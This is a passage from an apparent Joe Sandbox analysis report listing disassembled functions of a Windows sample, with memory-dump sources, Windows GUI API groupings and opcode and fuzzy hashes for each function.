                                                                            • API ID: Window$DeferRect$BeginEqualExceptionThrow
                                                                            • String ID:
                                                                            • API String ID: 2064151242-0
                                                                            • Opcode ID: 500399a4ebb872557b7c2f278f24166c5f0561e00a4a887da5381fa2d1c680e8
                                                                            • Instruction ID: 939d23692e671d43b1c9f43e1c3a09bd01ab1d3a45b79ed7b31e410e1da1d1bc
                                                                            • Opcode Fuzzy Hash: 500399a4ebb872557b7c2f278f24166c5f0561e00a4a887da5381fa2d1c680e8
                                                                            • Instruction Fuzzy Hash: B7618B72714A4486EB52DB67E488BAD63A0F78CFD8F544212EF8917E69DF78C441C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140190368 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow$InvalidateRedraw$CursorEventMouseOffsetTrackUpdate
                                                                            • String ID:
                                                                            • API String ID: 359670716-0
                                                                            • Opcode ID: 3c4d14078e364269ea21f95171f8d41a1d29134e46590ff61f8f7b8300757b27
                                                                            • Instruction ID: 911c3723eb7de79f278fabae84f753a406523f1e415e34537a3c892c412290d7
                                                                            • Opcode Fuzzy Hash: 3c4d14078e364269ea21f95171f8d41a1d29134e46590ff61f8f7b8300757b27
                                                                            • Instruction Fuzzy Hash: 32614BB671079489EB42DB27A544BED27A4F75DF98F4A8026DF48177A4DF38C441C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400984A4 Relevance: 7.6, APIs: 5, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CursorLoad$Create
                                                                            • String ID:
                                                                            • API String ID: 1516763891-0
                                                                            • Opcode ID: d8b9f8772947e7fc3f00047e4641b0397c09838a111b62892fd9e93b02ebbeac
                                                                            • Instruction ID: bb1d88d85955e1e6cc2436274cfe786623cd90cc54f224fb2ab6a1be08857019
                                                                            • Opcode Fuzzy Hash: d8b9f8772947e7fc3f00047e4641b0397c09838a111b62892fd9e93b02ebbeac
                                                                            • Instruction Fuzzy Hash: 65617534A04A4186FA27EB23A8157DA6391BB4D7D5F444029FF498B7F2DFBCC8458B44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014011E284 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 72dee6434afb6ff163dc6833d3267e98e47068dfc7c950ed0620af719ef86018
                                                                            • Instruction ID: 32fca3d3eadb5fe54404f1121cdc9988bea2de06b010e0fd725f013f215fb32c
                                                                            • Opcode Fuzzy Hash: 72dee6434afb6ff163dc6833d3267e98e47068dfc7c950ed0620af719ef86018
                                                                            • Instruction Fuzzy Hash: CB51B131704A8082EA69DBA6E8947EE73A1F78CF90F484125DB5A8BBF1DF78C445C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014014016C Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InfoMonitorRect$CopyFromIntersectParametersPointSystem
                                                                            • String ID:
                                                                            • API String ID: 2931574886-0
                                                                            • Opcode ID: 7b3b9d448149960f0dd42dd2923ad9efa508a3348e1708c9301f33846fa47ad3
                                                                            • Instruction ID: fd3204a7fcf449090e50857f94863ead178717563412e285ce1e27df54b8ddb1
                                                                            • Opcode Fuzzy Hash: 7b3b9d448149960f0dd42dd2923ad9efa508a3348e1708c9301f33846fa47ad3
                                                                            • Instruction Fuzzy Hash: 12513476A00A40AEE712CF7AC484BDD37B1F74CB88F058526DB0897BA9DB74D959CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140170700 Relevance: 7.6, APIs: 5, Instructions: 120windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CursorEmptyMessagePostWindow
                                                                            • String ID:
                                                                            • API String ID: 1800939087-0
                                                                            • Opcode ID: 83661eee296852737a77d617b96f1a485df7a6fc6cd5e5b3d3c6f958556c1eac
                                                                            • Instruction ID: 61d2afcc3a6ce41465e88c7f914fb9d833607099e95d1eaab364109e7e7b0659
                                                                            • Opcode Fuzzy Hash: 83661eee296852737a77d617b96f1a485df7a6fc6cd5e5b3d3c6f958556c1eac
                                                                            • Instruction Fuzzy Hash: 7351AD32B10741DAEB1BCBB6D9857ED33A1E78CB84F104525CB45A7AA5DB34E494CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400BE87C Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRect$Screen
                                                                            • String ID:
                                                                            • API String ID: 3187875807-0
                                                                            • Opcode ID: 24e9480911cb8439f81642719bb638891d867c25c4bf9e5ae5d32fcd72d31918
                                                                            • Instruction ID: b1b5c9768d7ca6d1e980f35dedacc1a8165d78d8cd3e5c1012b6a879c9453f4a
                                                                            • Opcode Fuzzy Hash: 24e9480911cb8439f81642719bb638891d867c25c4bf9e5ae5d32fcd72d31918
                                                                            • Instruction Fuzzy Hash: F4412C32B10A51CAF756CFBAD9547ED3770FB4CB88F144129EF4A9B6A8DA34C9498700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140156700 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientEmptyScreen$EqualOffsetUnionWindow
                                                                            • String ID:
                                                                            • API String ID: 2676815302-0
                                                                            • Opcode ID: a6e5b2ad23e684e380efc0b3c632c0ce7dc48975047b4431405b248daf4e25f3
                                                                            • Instruction ID: 1728ed1188d560735bd12da79033578e275124146845243f6da34ed4f2bec2cd
                                                                            • Opcode Fuzzy Hash: a6e5b2ad23e684e380efc0b3c632c0ce7dc48975047b4431405b248daf4e25f3
                                                                            • Instruction Fuzzy Hash: 92410532B20A609AEB11CFB6E844BDD37B1F748B88F544125EE4A67A68DF38D945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140082728 Relevance: 7.6, APIs: 5, Instructions: 85memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$AllocCreateEnterExceptionLeaveLockStreamThrow
                                                                            • String ID:
                                                                            • API String ID: 1516886618-0
                                                                            • Opcode ID: f5eb67c6d05cc7e81d3482045d19e3bd38c5b438a68aee497100739d03acaadb
                                                                            • Instruction ID: 340c188f41b7d8acc9c83f29c6e944cad3d7e0c6a4c404b1096ed80d751390cd
                                                                            • Opcode Fuzzy Hash: f5eb67c6d05cc7e81d3482045d19e3bd38c5b438a68aee497100739d03acaadb
                                                                            • Instruction Fuzzy Hash: 7A3164B6210B0186EB16DB53E8483A96BA0F78CFE1F154528EB09077F6DF78C945C640
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400643BC Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$wcschr
                                                                            • String ID:
                                                                            • API String ID: 1606153090-0
                                                                            • Opcode ID: 7af861fd32e3facd811c674ed131931c999387065073a8947150b4c7b7c1d960
                                                                            • Instruction ID: 37ec119d55331b8bedf009d1fb1af1190da8be3fec0baf63b684671b5bb31b30
                                                                            • Opcode Fuzzy Hash: 7af861fd32e3facd811c674ed131931c999387065073a8947150b4c7b7c1d960
                                                                            • Instruction Fuzzy Hash: 21317876600745DAEB258F62E804BEE3721FB88B9CF541922EB194BF98CF78C555C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C2300 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$ConditionMask$ClientInfoLoadMetricsRectScreenSystemVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 506465941-0
                                                                            • Opcode ID: cc3a1d03433cb5574da79bb8019fe8a5dd3879c74cb3578edb47f5a3a5223b9b
                                                                            • Instruction ID: 9c9979cdbeb6df83b8b80d630f81e5fe5763b6df1bf287391f798f1b83c5c1e9
                                                                            • Opcode Fuzzy Hash: cc3a1d03433cb5574da79bb8019fe8a5dd3879c74cb3578edb47f5a3a5223b9b
                                                                            • Instruction Fuzzy Hash: 76317835B14A4186FB469B17E814BD967A0F79CFD5F084026EF09877B1DFB8C9418744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C80BC Relevance: 7.6, APIs: 5, Instructions: 61windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AtomGlobal$Name$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 1515195355-0
                                                                            • Opcode ID: f824873ec07ca01c8da2e6fb18faf362fafb0cf8c385aec1a7099471c3428184
                                                                            • Instruction ID: 9e7245d052a26c94062a43323f153e7dbb4186232d8475490ce665c852ed571a
                                                                            • Opcode Fuzzy Hash: f824873ec07ca01c8da2e6fb18faf362fafb0cf8c385aec1a7099471c3428184
                                                                            • Instruction Fuzzy Hash: 6221B336214A9082FB769F12E4687EA67A5F78CFC5F490021EF890B7A4DB38C946C710
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400F0388 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$CaptureLoad
                                                                            • String ID:
                                                                            • API String ID: 1460996051-0
                                                                            • Opcode ID: da691c9d0e217264b2f7177ce2d39de1eb34a102b86b4459bfe32d5ce26e131b
                                                                            • Instruction ID: 316667aa3591028057343bf394aa0cbb75040aa28a5edade171fcf380a0da5f9
                                                                            • Opcode Fuzzy Hash: da691c9d0e217264b2f7177ce2d39de1eb34a102b86b4459bfe32d5ce26e131b
                                                                            • Instruction Fuzzy Hash: 6C213D3520468191EE4ADB63E5693ED2351BB8DFC4F084026EF5A4B7B2DF79D555C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400CA160 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DesktopLongShow
                                                                            • String ID:
                                                                            • API String ID: 1948769292-0
                                                                            • Opcode ID: 3d7858e69acef842ba55361f88f2e30bb78e50fa86d43330b7e885c71cbf5564
                                                                            • Instruction ID: c78f9d8a0d3b0930f4dffcb9450453c89c80f79e78456b24798229c9db115ae8
                                                                            • Opcode Fuzzy Hash: 3d7858e69acef842ba55361f88f2e30bb78e50fa86d43330b7e885c71cbf5564
                                                                            • Instruction Fuzzy Hash: 1721633134879542FA6E9B17A80939E62A1EB8A7D4F184034FF97477E9DE7DCC418300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014005E1C8 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$MessagePost
                                                                            • String ID:
                                                                            • API String ID: 2076725448-0
                                                                            • Opcode ID: 9daee687eb8c2d5e74b94bf4d7bd1d43af1d730b11a7b203541c193bedbd8cdd
                                                                            • Instruction ID: 6205b49d6dde4ffb3aa512a8c8eb524526d82b6156ac9ab85e6ac97ab5a773e3
                                                                            • Opcode Fuzzy Hash: 9daee687eb8c2d5e74b94bf4d7bd1d43af1d730b11a7b203541c193bedbd8cdd
                                                                            • Instruction Fuzzy Hash: 0111B935705B9082EE5ADB93E9553EA1365BB8DFC5F084035EF4E9B7A9DE39C4018340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C650C Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
